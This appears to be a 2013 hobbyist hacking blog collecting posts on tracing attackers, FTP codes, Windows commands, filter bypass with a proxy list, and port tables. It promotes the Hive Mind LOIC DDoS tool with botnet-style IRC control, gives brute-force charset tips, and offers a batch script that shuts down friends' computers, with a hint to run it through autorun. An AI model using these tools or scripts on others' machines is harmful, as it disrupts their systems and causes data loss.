Now, straight away, this should make more sense to you. Your computer is connected on two ports, 80 and 27374. Port 80 is used for http/www transmissions (ie for all intents and purposes, its how you connect to the net, although of course it's a lot more complicated than that). Port 27374, however, is distinctly suspicious; first of all, it is in the registered port range, and although other services (like MSN) use these, let's assume that you have nothing at all running like instant messengers, webpages etc....you're simply connected to the net through proxy. 

So, now this connection is looking even more troublesome, and when you realise that 27374 is a common port for Netbus (a potentially destructive Trojan), you can see that something is untoward here. So, what you would do is: 

1) run Netstat , and use: 
Netstat -a 
then 
Netstat -an 
So you have both Hostnames AND IP addresses. 

Tracerouting

Having the attacker's IP is all well and good, but what can you do with it? The answer is, a lot more! It's not enough to have the address, you also need to know where the attacker's connections are coming from. You may have used automated tracerouting tools before, but do you jknow how they work? 

Go back to MSDOS and type 

tracert *type IP address/Hostname here* 

Now, what happens is, the Traceroute will show you all the computers inbetween you and the target machine, including blockages, firewalls etc. More often than not, the hostname address listed before the final one will belong to the Hacker's ISP Company. It'll either say who the ISP is somewhere in there, or else you run a second trace on the new IP/hostname address to see who the ISP Company in question is. 

If the Hostname that you get back doesn't actually seem to mention an actual geographical location within its text, you may think all is lost. But fear not! Suppose you get a hostname such as 

http://www.haha.com 

Well, that tells us nothing, right? Wrong....simply enter the hostname in your browser, and though many times you will get nothing back, sometimes it will resolve to an ISP, and from there you can easily find out its location and in what areas they operate. This at least gives you a firm geographical location to carry out your investigations in. 

If you STILL have nothing, as a last resort you COULD try connecting to your target's ISP's port 13 by Telnet, which will tell you how many hours ahead or behind this ISP is of GMT, thus giving you a geographical trace based on the time mentioned (although bear in mind, the ISP may be doing something stupid like not having their clocks set correctly, giving you a misleading trace. Similarly, a common tactic of Hackers is to deliberately have their computer's clock set to a totally wrong time, so as to throw you off the scent). Also, unless you know what you're doing, I wouldn't advise using Telnet (which is outside the parameters of this tutorial). 

Reverse DNS Query

This is probably the most effective way of running a trace on somebody. If ever you're in a chatroom and you see someone saying that they've "hacked into a satellite orbiting the Earth, and are taking pictures of your house right now", ignore them because that's just bad movie nonsense. THIS method is the way to go, with regard to finding out what country (even maybe what State/City etc) someone resides, although it's actually almost impossible to find an EXACT geographical location without actually breaking into your ISP's Head Office and running off with the safe. 

To run an rDNS query, simply go back to MS-DOS and type 
netstat and hit return. Any active connections will resolve to hostnames rather than a numerical format. 

DNS

DNS stands for Domain Name Server. These are machines connected to the Internet whose job it is to keep track of the IP Addresses and Domain Names of other machines. When called upon, they take the ASCII Domain Name and convert it to the relevant numeric IP Address. A DNS search translates a hostname into an IP address....which is why we can enter "www.Hotmail.com" and get the website to come up, instead of having to actually remember Hotmail's IP address and enter that instead. Well, Reverse DNS, of course, translates the IP Address into a Hostname (ie - in letters and words instead of numbers, because sometimes the Hacker will employ various methods to stop Netstat from picking up a correct Hostname). 

So, for example, 
298.12.87.32 is NOT a Hostname. 
mail6.bol.net.au IS a Hostname. 

Anyway, see the section at the end? (au) means the target lives in Australia. Most (if not all) hostnames end in a specific Country Code, thus narrowing down your search even further. If you know your target's Email Address (ie they foolishly sent you a hate mail, but were silly enough to use a valid email address) but nothing else, then you can use the Country codes to deduce where they're from as well. 

You can also deduce the IP address of the sender by looking at the emails header (a "hidden" line of code which contains information on the sender)...on Hotmail for example, go to Preferences, and select the "Full Header's Visible" option. Alternatively, you can run a "Finger" Trace on the email address, at: 

www.samspade.org 

Plus, some ISP's include their name in your Email Address with them too (ie Wanadoo, Supanet etc), and your Hacker may be using an email account that's been provided by a Website hosting company, meaning this would probably have the website host's name in the email address (ie Webspawners). So, you could use the information gleaned to maybe even hunt down their website (then you could run a website check as mentioned previously) or report abuse of that Website Provider's Email account (and thus, the Website that it goes with) to 

abuse@companynamegoeshere.com 

FTP Error Codes

FTP Error Messages 

Some nice info about ftp error codes so you know what they mean. I am sure you see them all the time and sometimes you dont know what they mean, so take a look here.

The most common codes: 

421 - often means: too many users logged to the same account.
530 - wrong login pass, some servers auto-switch to 530 from
421 when they reach the max # of users. so notice the error message attached to the code.
550 - common in Ratio site, If the file exsist it means you have no access to the file or dir.

If you try changing directories in an FTP and you`re getting a 550
message, it means you don`t have access to the directory.

It doesn`t mean you don`t have access to a directory inside that directory. (Meaning when getting a direct path, log into
the path directly, not 1 directory by 1).

All others: 

110 Restart marker reply. In this case, the text is exact and not left to the particular implementation; it must read: MARK yyyy = mmmm Where yyyy is User-process data stream marker, and mmmm server's equivalent marker (note the spaces between markers and "=").
120 Service ready in nnn minutes.
125 Data connection already open; transfer starting.
150 File status okay; about to open data connection.
200 Command okay.
202 Command not implemented, superfluous at this site.
211 System status, or system help reply.
212 Directory status.
213 File status.
214 Help message. On how to use the server or the meaning of a particular non-standard command. This reply is useful only to the human user.
215 NAME system type. Where NAME is an official system name from the list in the Assigned Numbers document.
220 Service ready for new user.
221 Service closing control connection. Logged out if appropriate.
225 Data connection open; no transfer in progress.
226 Closing data connection. Requested file action successful (for example, file transfer or file abort).
227 Entering Passive Mode (h1,h2,h3,h4,p1,p2).
230 User logged in, proceed.
250 Requested file action okay, completed.
257 "PATHNAME" created.
331 User name okay, need password.
332 Need account for login.
350 Requested file action pending further information.
421 Too many users logged to the same account
425 Can't open data connection.
426 Connection closed; transfer aborted.
450 Requested file action not taken. File unavailable (e.g., file busy).
451 Requested action aborted: local error in processing.
452 Requested action not taken. Insufficient storage space in system.
500 Syntax error, command unrecognized. This may include errors such as command line too long.
501 Syntax error in parameters or arguments.
502 Command not implemented.
503 Bad sequence of commands.
504 Command not implemented for that parameter.
530 Not logged in.
532 Need account for storing files.
550 Requested action not taken. File unavailable (e.g., file not found, no access).
551 Requested action aborted: page type unknown.
552 Requested file action aborted. Exceeded storage allocation (for current directory or dataset).
553 Requested action not taken. File name not allowed.

Thursday, June 6, 2013

Sand Box

What is sand box?

sandbox is a security mechanism for separating running programs. It is often used to execute untested code, or untrusted programs from unverified third-parties, suppliers, untrusted users and untrusted websites.

The sandbox typically provides a tightly controlled set of resources for guest programs to run in, such as scratch space on disk and memory. Network access, the ability to inspect the host system or read from input devices are usually disallowed or heavily restricted.


Sandboxie

Sandboxie runs your programs in an isolated space which prevents them from making permanent changes to other programs and data in your computer.

The red arrows indicate changes flowing from a running program into your computer. The box labeled Hard disk (no sandbox) shows changes by a program running normally. The box labeled Hard disk (with sandbox) shows changes by a program running under Sandboxie. The animation illustrates that Sandboxie is able to intercept the changes and isolate them within a sandbox, depicted as a yellow rectangle. It also illustrates that grouping the changes together makes it easy to delete all of them at once.

Benefits of the Isolated Sandbox
  1. Secure Web Browsing: Running your Web browser under the protection of Sandboxie means that all malicious software downloaded by the browser is trapped in the sandbox and can be discarded trivially.
  2. Enhanced Privacy: Browsing history, cookies, and cached temporary files collected while Web browsing stay in the sandbox and don't leak into Windows.
  3. Secure E-mail: Viruses and other malicious software that might be hiding in your email can't break out of the sandbox and can't infect your real system.
  4. Windows Stays Lean: Prevent wear-and-tear in Windows by installing software into an isolated sandbox.



Tuesday, June 4, 2013

Types Of Hackers

Hacker: people who access a computer resource, without authorization, uses his or her skills to commit unlawful acts, or to deliberately create mischief.

There are six types of hackers:

  1. CODERS
  2. ADMINS
  3. SCRIPT KIDDIES
  4. WHITE HAT
  5. BLACK HAT
  6. GREY HAT
CODERS

The Real Hackers are the Coders, the ones who revise the methods and create tools that are available in the market. Coders can find security holes and weaknesses such as buffer overflow in software to create their own exploits.

ADMINS
Admins are the computer guys who use the tools and exploits prepared by the coders. They do not develop their own techniques, however they uses the tricks which are already prepared by the coders. They are generally System Administration, or Computer Network Controller. Most of the Hackers and security person in this  digital world come under this category.


SCRIPT KIDDIES

Script Kiddies are the bunnies who use script and programs developed by others to attack computer systems and Networks. They get the least respect but are most annoying and dangerous and can cause big problems without actually knowing what they are doing.

WHITE HAT
A White Hat Hacker is computer guy who perform Ethical Hacking. These are usually security professionals with knowledge of hacking and the Hacker tool set and who use this knowledge to locate security weaknesses and implement counter measures in the resources. They are also known as an Ethical Hacker or a Penetration Tester. They focus on Securing and Protecting IT systems.

BLACK HAT
A  Hacker is computer guy who performs Unethical Hacking. These are the Criminal Hackers or Crackers who use their skills and knowledge for illegal or malicious purposes. They break into or otherwise violate the system integrity of remote machines, with malicious intent. These are also known as an Unethical Hacker or a Security Cracker. They focus on Security Cracking and Data stealing.

GREY HAT
A Grey Hat Hacker is a Computer guy who sometimes acts legally, sometimes in good will, and sometimes not. They usually do not hack for personal gain or have malicious intentions, but may or may not occasionally commit crimes during the course of their technological exploits.They are hybrid between White Hat and Black Hat Hackers.

Common Run Command

compmgmt.msc = computer management
certmgr.msc = certificate manager
diskmgmt.msc = disk management
devmgmt.msc = device manager
eventvwr.msc = event viewer
fsmgmt.msc = share folder manager
gpedit.msc = group policy editor
lusrmgr.msc = local users and groups
ntmsmgr.msc = removable storage
ntmsoprq.msc = removable storage operator requests
perfmon.msc = performance monitor
rsop.msc = resultant set of policy
secpol.msc = local security settings
services.msc = services
wmimgmt.msc = windows management instrumentation

conf = netmeeting
calc = calculator
clipbrd = clipbook viewer
charmap = character mapping table
chkdsk.exe = check disk
cmd = command prompt
cleanmgr = clean disk
dxdiag = check DirectX information
dcomcnfg = component services
eudcedit = private character editor
logoff = logoff
mem.exe = memory usage
msconfig.exe = system configuration
mplayer2 = windows media player
mspaint = paint
mstsc = remote desktop
magnify = magnify
mmc = microsoft management console
mobsync = synchronize setting
notepad = notepad
ntbackup = backup or restore wizard
narrator = narrator
osk = on screen keyboard
odbcad32 = ODBC data source administrator
packager = object packager
regedit.exe = registry
rononce -p = shutdown (15secs)
regedt32 = registry editor
sysedit = system configuration editor
sigverif = file signature verification
sndrec32 = sound recorder
shrpubw = create shared folder wizard
syskey = encrypt windows
Sndvol32 = volume control
sfc.exe = resource checker
tsshutdn = shutdown (60secs)
taskmgr = task manager
tourstart = xp tour
utilman = ease of access center
winchat = windows chat
winver = check windows version
winmsd = check system information
wupdmgr = windows update manager
wscript = windows script host
write = word pad

Control
Control userpasswords2
Control access.cpl
Control appwiz.cpl
Control bthprops.cpl
Control desk.cpl
Control hdwwiz.cpl
Control inetcpl.cpl
Control firewall.cpl
Control intl.cpl
Control irprops.cpl
Control joy.cpl
Control main.cpl
Control mmsys.cpl
Control ncpa.cpl
Control netsetup.cpl
Control nusrmgr.cpl
Control nvtuicpl.cpl
Control odbccp32.cpl ODBC
Control powercfg.cpl
Control sysdm.cpl
Control telephon.cpl
Control timedate.cpl
Control wscui.cpl Windows
Control wuaucpl.cpl

shell:Common Administrative Tools
shell:Administrative Tools
shell:SystemX86 System32
shell:My Pictures
shellrofile %userprofile%
shell:CommonProgramFiles
shellrogramFiles %programfiles%
shell:System
shell:Windows %windir%
shell:History
shell:Cookies
shellocal AppData
shell:AppData
shell:Common Documents
shell:Common Templates
shell:Common AppData
shell:Common Favorites
shell:Common Desktop
shell:Common Menu
shell:Common Programs
shell:Common Startup
shell:Templates
shellrintHood
shell:NetHood
shell:Favorites
shellersonal
shell:SendTo
shell:Recent
shell:Menu
shellrograms
shell:Startup
shellesktop
shell:Fonts
shell:ConnectionsFolder
shell:RecycleBinFolder
shellrintersFolder
shell:ControlPanelFolder Control
shell:InternetFolder
shellriveFolder
shell:NetworkFolder
shellesktopFolder

Monday, June 3, 2013

Enhance Brute Force Attack Charset

Choosing a custom charset of 0123456789abcdefghijklmnopqrstuvwxyz you'll get passwords much faster than the standard a-z0-9 charset. With a charset of a-z0-9, password cracking program will tries aaaaaaa baaaaaa caaaaaa and so on.

But with 0-9a-z, program will try 00000000 10000000 2000000 and so on - so you'll get the passwords with numbers at the end first. In other words, whereas the default numbers-last charsets will only reach the passwords with numbers at the end after almost the maximum time, a custom charset with numbers first will start with passwords with numbers at the end. It's not much but I find it does help.

Another common technique is use eatoinsrhldcumfpgwybvkxjqz instead abcdefghijklmnopqrstuvwxyz.

Everyone knows that 'e' is the most commonly used letter in the english language, so it makes sense to try it before the less commonly used letters. In fact, 'j', 'q' and 'z' are so uncommon, I sometimes leave them off the list altogether since it makes such a significant improvement on cracking time.

Sunday, June 2, 2013

Google Hacks

Almost all the internet user would recognize one of the popular search engine, the "GOOGLE". By utilizing various search operator that already provided in Google Search Engine, we could make our search result become more accurate. Therefore, an application named "Google Hacks" appear to help users to facilitate the search function of Google.



What is Google Hack? Google Hacks is an open source application that can be used as an aid in searching through Google. Search music, ebooks, videos, product key, the lyrics, the font is part of the basic search function to do with this program. Enter keywords and click the options provided, then Google Hacks will weave keywords with search operators and displays Google results pages through the browser. If we are lucky, we will get what we are looking for.

DOWNLOAD HERE

Friday, May 31, 2013

HIVE MIND LOIC

Hive Mind LOIC is a version of the Low Ordbit Ion Cannon made by Praetox, which was adapted for centralized control by NewEraCracker, when the project was then taken on by me. The amongst a few fixes I added RSS control (Such as via Twitter).  - Urijah

  • Stress test your servers against a DDoS attack
  • Control your bots via an IRC channel or an RSS server
  • Minimize the application to systray


Official Website: Hive Mind LOIC

Download : HERE

Thursday, May 30, 2013

Ways To Access Blocked WebSite

Usually, websites are block or filter depends on different situation such as company policies, school, or even by country policy. Luckily, there are some tricks exist to aid us to overcome this situation, which you can bypass the restrictions and the policy, the most common method is the use of proxies or anonymizer websites. Unfortunately, using proxies doesn't always works as they might get blocked by firewall.

The following are some other method you can consider to help you to access blocked websites:

Use IP instead of URL

Each website has it own IP represented by URL. This method work best when filter list is define in URL. For example, to access facebook, simply type 173.252.73.52 in browser. You can check website IP uses ping function in command prompt.

Use cache

Most of the search engine store cached page of websites. You can  access blocked website by viewing the cached copy in search engine.

Translation services

Google translate or Bing translate can do website translation to another language (but we don't need that). When you do this, you are actually access the website via Google/Bing IP.

 Retrieve website via Email

Web2Mail is a free service that send any websites into your inbox. Just send an email to www@web2mail.com with the URL as title.

Website archive

Wayback Machine is an internet archive that store a copy of almost all websites since they started and update version after that. You can access to blocked website by fetching the lastest copy from archive.

Screen Resolution

An interesting website that allow you to view any website in different resolution. Similar to translation service, you actually accessing blocked website via the website IP. (Internet Explorer Only)

Mobile Search

Display a website in mobile form which evade from filtering list. You can use Springbox Mobilizer, an emulator that works like a mobile on your desktop.

Short URL service

Usually used to convert long URL into shorter for easy remember. You can convert your blocked website into shorter one to evade detection. Popular URL shorten service are bit.ly and adf.ly.

Tor Browser

A virtual tunnel that redirect your request to a distributed network of relay. You can learn more at HERE.

Proxy Websites

Some other website that offer proxy service.

Proxy Website List

http://www.hidemyass.com
http://www.anonymizer.com
http://www.wujie.net
http://www.ultrareach.net
http://surfshield.net
http://www.guardster.com/subscription/proxy_free.php
http://anonymouse.ws/anonwww.html
http://www.browser-x.com
http://www.spysurfing.com
http://www.xerohour.org/hideme
http://www.proxyz.be
http://www.sc0rian.com/prox
https://www.proxify.us
http://kproxy.com/index.jsp
http://www.brawl-hall.com/pages/proxy.php
http://www.proxify.net
http://proxy.computersteroids.com/index0.php
http://www.unipeak.com
http://flyproxy.com
http://alienproxy.com
http://proxify.com
http://www.unfilter.net
http://www.proxymouse.com
http://www.surfonym.com/cgi-bin/nph-proxy
http://www.superproxy.be/browse.pl
http://www.websiteguru.com/mrnewguy
http://www.letsproxy.com
http://www.fsurf.com
http://indianproxy.com
http://www.letmeby.com
http://Boredatschool.net
http://www.ibypass.org
http://www.ipzap.com
https://proxify.biz
http://kproxy.com/index.jsp
http://www.attackcensorship.com/attack-censorship.html
http://mrnewguy.com
http://www.evilsprouts.co.uk/defilter
http://www.proxify.info
http://www.torify.com
http://www.switchproxy.com
http://www.proxifree.com
http://www.secure-tunnel.com
http://www.proxify.cn
http://www.arnit.net/utilities/webproxy/new
http://www.proxify.co.uk
http://www.betaproxy.com
http://www.proxify.org
http://www.proxychoice.com
http://www.proxysnail.com
http://www.anonypost.com
http://www.thestrongestlinks.com
http://www.hujiko.com
http://www.anonproxy.info
http://www.peoplesproxy.com
http://www.freeproxy.us
http://www.proxyweb.net
http://www.nopath.com
http://urlencoded.com
http://www.pole.ws
http://www.browseany.com
http://www.spiderproxy.com
http://www.clickcop.com
http://www.sneakysurf.com
http://www.mywebtunnel.com
http://www.thewebtunnel.com
http://www.3proxy.com
http://www.yourfreeproxy.com
http://www.proxy7.com
http://www.fireprox.com
http://www.stupidcensorship.com
http://www.letsproxy.com
http://www.sneak2.com
http://www.cecid.com
http://www.freeproxy.ca
http://www.ibypass.org
http://www.goproxing.com
http://www.projectbypass.com
http://www.ipsecret.com
http://www.nomorelimits.net
http://www.proxify.de
http://www.bywhat.com
http://www.snoopblocker.com
http://www.anonymizer.ru
http://www.proxyking.net
http://www.perlproxy.com
http://www.proxylord.com
http://tntproxy.com
http://satanproxy.com
http://zombieinvasion.info

Tuesday, May 28, 2013

Shutdown PC

Make use of shutdown.exe in windows and prank your friends.
  1. Create a shortcut by right click on the desktop, then point your mouse to new and select shortcut.
  2. Type/Paste the following code in the shortcut. 
    • C:\Windows\System32\shutdown.exe -s -t 60 -c " message "
  3. -s is to shutdown computer | -t is to set time (seconds) | -c is to set message
  4. Simple replace 60 for any seconds you like and remember to put some scary message for your friend.

Notepad Version

Copy the following code into notepad:

@echo off
msg * I don't like you
shutdown -s -t 60 -c "Error! You are too stupid!"

Save as Hackmimic_shutdown.bat

Updates:

Search this blog for autorun script and automate it.

Full options for shutdown command

    No args    Display help. This is the same as typing /?.
    /?         Display help. This is the same as not typing any options.
    /i         Display the graphical user interface (GUI).
               This must be the first option.
    /l         Log off. This cannot be used with /m or /d options.
    /s         Shutdown the computer.
    /r         Full shutdown and restart the computer.
    /g         Full shutdown and restart the computer. After the system is
               rebooted, restart any registered applications.
    /a         Abort a system shutdown.
               This can only be used during the time-out period.
    /p         Turn off the local computer with no time-out or warning.
               Can be used with /d and /f options.
    /h         Hibernate the local computer.
               Can be used with the /f option.
    /hybrid    Performs a shutdown of the computer and prepares it for fast startup.
                   Must be used with /s option.
    /e         Document the reason for an unexpected shutdown of a computer.
    /o         Go to the advanced boot options menu and restart the computer.
               Must be used with /r option.
    /m       \\computer Specify the target computer.
    /t xxx   Set the time-out period before shutdown to xxx seconds.
               The valid range is 0-315360000 (10 years), with a default of 30.
               If the timeout period is greater than 0, the /f parameter is
               implied.
    /c "comment" Comment on the reason for the restart or shutdown.
               Maximum of 512 characters allowed.
    /f         Force running applications to close without forewarning users.
               The /f parameter is implied when a value greater than 0 is
               specified for the /t parameter.
    /d [p|u:]xx:yy  Provide the reason for the restart or shutdown.
               p indicates that the restart or shutdown is planned.
               u indicates that the reason is user defined.
               If neither p nor u is specified the restart or shutdown is
               unplanned.
               xx is the major reason number (positive integer less than 256).
               yy is the minor reason number (positive integer less than 65536)

Monday, May 27, 2013

Ports and Protocols

Sorted by port number:

Port
Protocol
Application protocol
System Service Name
n/a
GRE
GRE (IP protocol 47)
Routing and Remote Access
n/a
ESP
IPSec ESP (IP protocol 50)
Routing and Remote Access
n/a
AH
IPSec AH (IP protocol 51)
Routing and Remote Access
7
TCP
Echo
Simple TCP/IP Services
7
UDP
Echo
Simple TCP/IP Services
9
TCP
Discard
Simple TCP/IP Services
9
UDP
Discard
Simple TCP/IP Services
13
TCP
Daytime
Simple TCP/IP Services
13
UDP
Daytime
Simple TCP/IP Services
17
TCP
Quotd
Simple TCP/IP Services
17
UDP
Quotd
Simple TCP/IP Services
19
TCP
Chargen
Simple TCP/IP Services
19
UDP
Chargen
Simple TCP/IP Services
20
TCP
FTP default data
FTP Publishing Service
21
TCP
FTP control
FTP Publishing Service
21
TCP
FTP control
Application Layer Gateway Service
23
TCP
Telnet
Telnet
25
TCP
SMTP
Simple Mail Transfer Protocol
25
UDP
SMTP
Simple Mail Transfer Protocol
25
TCP
SMTP
Exchange Server
25
UDP
SMTP
Exchange Server
42
TCP
WINS Replication
Windows Internet Name Service
42
UDP
WINS Replication
Windows Internet Name Service
53
TCP
DNS
DNS Server
53
UDP
DNS
DNS Server
53
TCP
DNS
Internet Connection Firewall/Internet Connection Sharing
67
UDP
DHCP Server
DHCP Server
67
UDP
DHCP Server
Internet Connection Firewall/Internet Connection Sharing
69
UDP
TFTP
Trivial FTP Daemon Service
80
TCP
HTTP
Windows Media Services
80
TCP
HTTP
World Wide Web Publishing Service
80
TCP
HTTP
SharePoint Portal Server
88
TCP
Kerberos
Kerberos Key Distribution Center
88
UDP
Kerberos
Kerberos Key Distribution Center
102
TCP
X.400
Microsoft Exchange MTA Stacks
110
TCP
POP3
Microsoft POP3 Service
110
TCP
POP3
Exchange Server
119
TCP
NNTP
Network News Transfer Protocol
123
UDP
NTP
Windows Time
123
UDP
SNTP
Windows Time
135
TCP
RPC
Message Queuing
135
TCP
RPC
Remote Procedure Call
135
TCP
RPC
Exchange Server
135
TCP
RPC
Certificate Services
135
TCP
RPC
Cluster Service
135
TCP
RPC
Distributed File System
135
TCP
RPC
Distributed Link Tracking
135
TCP
RPC
Distributed Transaction Coordinator
135
TCP
RPC
Event Log
135
TCP
RPC
Fax Service
135
TCP
RPC
File Replication
135
TCP
RPC
Local Security Authority
135
TCP
RPC
Remote Storage Notification
135
TCP
RPC
Remote Storage Server
135
TCP
RPC
Systems Management Server 2.0
135
TCP
RPC
Terminal Services Licensing
135
TCP
RPC
Terminal Services Session Directory
137
UDP
NetBIOS Name Resolution
Computer Browser
137
UDP
NetBIOS Name Resolution
Server
137
UDP
NetBIOS Name Resolution
Windows Internet Name Service
137
UDP
NetBIOS Name Resolution
Net Logon
137
UDP
NetBIOS Name Resolution
Systems Management Server 2.0
138
UDP
NetBIOS Datagram Service
Computer Browser
138
UDP
NetBIOS Datagram Service
Messenger
138
UDP
NetBIOS Datagram Service
Server
138
UDP
NetBIOS Datagram Service
Net Logon
138
UDP
NetBIOS Datagram Service
Distributed File System
138
UDP
NetBIOS Datagram Service
Systems Management Server 2.0
138
UDP
NetBIOS Datagram Service
License Logging Service
139
TCP
NetBIOS Session Service
Computer Browser
139
TCP
NetBIOS Session Service
Fax Service
139
TCP
NetBIOS Session Service
Performance Logs and Alerts
139
TCP
NetBIOS Session Service
Print Spooler
139
TCP
NetBIOS Session Service
Server
139
TCP
NetBIOS Session Service
Net Logon
139
TCP
NetBIOS Session Service
Remote Procedure Call Locator
139
TCP
NetBIOS Session Service
Distributed File System
139
TCP
NetBIOS Session Service
Systems Management Server 2.0
139
TCP
NetBIOS Session Service
License Logging Service
143
TCP
IMAP
Exchange Server
161
UDP
SNMP
SNMP Service
162
UDP
SNMP Traps Outbound
SNMP Trap Service
389
TCP
LDAP Server
Local Security Authority
389
UDP
LDAP Server
Local Security Authority
389
TCP
LDAP Server
Distributed File System
389
UDP
LDAP Server
Distributed File System
443
TCP
HTTPS
HTTP SSL
443
TCP
HTTPS
World Wide Web Publishing Service
443
TCP
HTTPS
SharePoint Portal Server
445
TCP
SMB
Fax Service
445
TCP
SMB
Print Spooler
445
TCP
SMB
Server
445
TCP
SMB
Remote Procedure Call Locator
445
TCP
SMB
Distributed File System
445
TCP
SMB
License Logging Service
445
TCP
SMB
Net Logon
500
UDP
IPSec ISAKMP
Local Security Authority
515
TCP
LPD
TCP/IP Print Server
548
TCP
File Server for Macintosh
File Server for Macintosh
554
TCP
RTSP
Windows Media Services
563
TCP
NNTP over SSL
Network News Transfer Protocol
593
TCP
RPC over HTTP
Remote Procedure Call
593
TCP
RPC over HTTP
Exchange Server
636
TCP
LDAP SSL
Local Security Authority
636
UDP
LDAP SSL
Local Security Authority
993
TCP
IMAP over SSL
Exchange Server
995
TCP
POP3 over SSL
Exchange Server
1270
TCP
MOM-Encrypted
Microsoft Operations Manager 2000
1433
TCP
SQL over TCP
Microsoft SQL Server
1433
TCP
SQL over TCP
MSSQL$UDDI
1434
UDP
SQL Probe
Microsoft SQL Server
1434
UDP
SQL Probe
MSSQL$UDDI
1645
UDP
Legacy RADIUS
Internet Authentication Service
1646
UDP
Legacy RADIUS
Internet Authentication Service
1701
UDP
L2TP
Routing and Remote Access
1723
TCP
PPTP
Routing and Remote Access
1755
TCP
MMS
Windows Media Services
1755
UDP
MMS
Windows Media Services
1801
TCP
MSMQ
Message Queuing
1801
UDP
MSMQ
Message Queuing
1812
UDP
RADIUS Authentication
Internet Authentication Service
1813
UDP
RADIUS Accounting
Internet Authentication Service
1900
UDP
SSDP
SSDP Discovery Service
2101
TCP
MSMQ-DCs
Message Queuing
2103
TCP
MSMQ-RPC
Message Queuing
2105
TCP
MSMQ-RPC
Message Queuing
2107
TCP
MSMQ-Mgmt
Message Queuing
2393
TCP
OLAP Services 7.0
SQL Server: Downlevel OLAP Client Support
2394
TCP
OLAP Services 7.0
SQL Server: Downlevel OLAP Client Support
2460
UDP
MS Theater
Windows Media Services
2535
UDP
MADCAP
DHCP Server
2701
TCP
SMS Remote Control (control)
SMS Remote Control Agent
2701
UDP
SMS Remote Control (control)
SMS Remote Control Agent
2702
TCP
SMS Remote Control (data)
SMS Remote Control Agent
2702
UDP
SMS Remote Control (data)
SMS Remote Control Agent
2703
TCP
SMS Remote Chat
SMS Remote Control Agent
2703
UPD
SMS Remote Chat
SMS Remote Control Agent
2704
TCP
SMS Remote File Transfer
SMS Remote Control Agent
2704
UDP
SMS Remote File Transfer
SMS Remote Control Agent
2725
TCP
SQL Analysis Services
SQL Analysis Server
2869
TCP
UPNP
UPNP Device Host
2869
TCP
SSDP event notification
SSDP Discovery Service
3268
TCP
Global Catalog Server
Local Security Authority
3269
TCP
Global Catalog Server
Local Security Authority
3343
UDP
Cluster Services
Cluster Service
3389
TCP
Terminal Services
NetMeeting Remote Desktop Sharing
3389
TCP
Terminal Services
Terminal Services
3527
UDP
MSMQ-Ping
Message Queuing
4011
UDP
BINL
Remote Installation
4500
UDP
NAT-T
Local Security Authority
5000
TCP
SSDP legacy event notification
SSDP Discovery Service
5004
UDP
RTP
Windows Media Services
5005
UDP
RTCP
Windows Media Services
42424
TCP
ASP.Net Session State
ASP.NET State Service
51515
TCP
MOM-Clear
Microsoft Operations Manager 2000